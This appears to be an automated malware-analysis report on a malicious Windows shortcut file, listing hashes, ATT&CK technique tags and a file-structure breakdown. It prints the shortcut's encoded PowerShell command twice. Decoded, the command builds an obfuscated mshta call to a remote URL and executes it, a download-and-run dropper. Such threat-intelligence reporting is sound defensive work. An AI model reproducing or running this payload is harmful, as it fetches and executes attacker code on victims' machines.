Malicious
Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b

LNK File
|
MD5: 6249bc1ecc0f57fdd1069fbcf6c7fb7b
|
Size: 2.5 KB
|
application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
6249bc1ecc0f57fdd1069fbcf6c7fb7b
Sha1
4fa8557fbd2d024a5041fd1fd4ac605d51aa3fde
Sha256
33bc7917b130f8405a350e5bacc78103157d20bfa2e205c34235c804427c7b60
Sha384
3803e4a6e4fe6bf9266e70300f80a7b05ede18bea10157960c339277e69c43fd53c210c9263f398c363d6cf5fa8791f9
Sha512
383870b19fff703965cc338ae745273f03f874f89b75791f8c509458245442e3863f5c30d024522656d79fd18b5a8ef84d48545827e852acec59fc47d71c6187
SSDeep
24:8Ayw/BHYVKVWf+/CWuOGqXkixaAk7GcZOBXZzJm0sHCEJMdd79dsrab7Z:8y5aBHqXkJAk7GcMJUiuMdJ9AaZ
TLSH
8251C1281AF202E9F277CB756BF977B34576FA96CD2446BC008062451622510F467E7B
File Structure
6249bc1ecc0f57fdd1069fbcf6c7fb7b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"
6249bc1ecc0f57fdd1069fbcf6c7fb7b (2.5 KB)
File Structure
6249bc1ecc0f57fdd1069fbcf6c7fb7b
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA

Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b
Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBzAF4AaABeAF4AXgB0AGEAXgBeAF4AIABeAF4AXgBeAGgAXgB0AF4AXgBeAHQAcABzADoAXgBeAC8ALwBpAG4AXgB2AF4AXgBlAHMAdABeAHQAXgByAGEAZABeAF4AXgAuAF4AXgBjAG8AXgBeAF4AXgBtAF4ALwBCAF4AXgBeAGwAXgBeAF4AXgB1AGUALgBtAF4AXgBeAHAANABeAF4AXgBeAF4AJwAuAHIAZQBwAGwAYQBjAGUAKAAnAF4AJwAsACcAJwApADsAaQBlAHgAIAAoAGcAYwBiACkA"

Malicious

6249bc1ecc0f57fdd1069fbcf6c7fb7b > LNK CommandLine > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙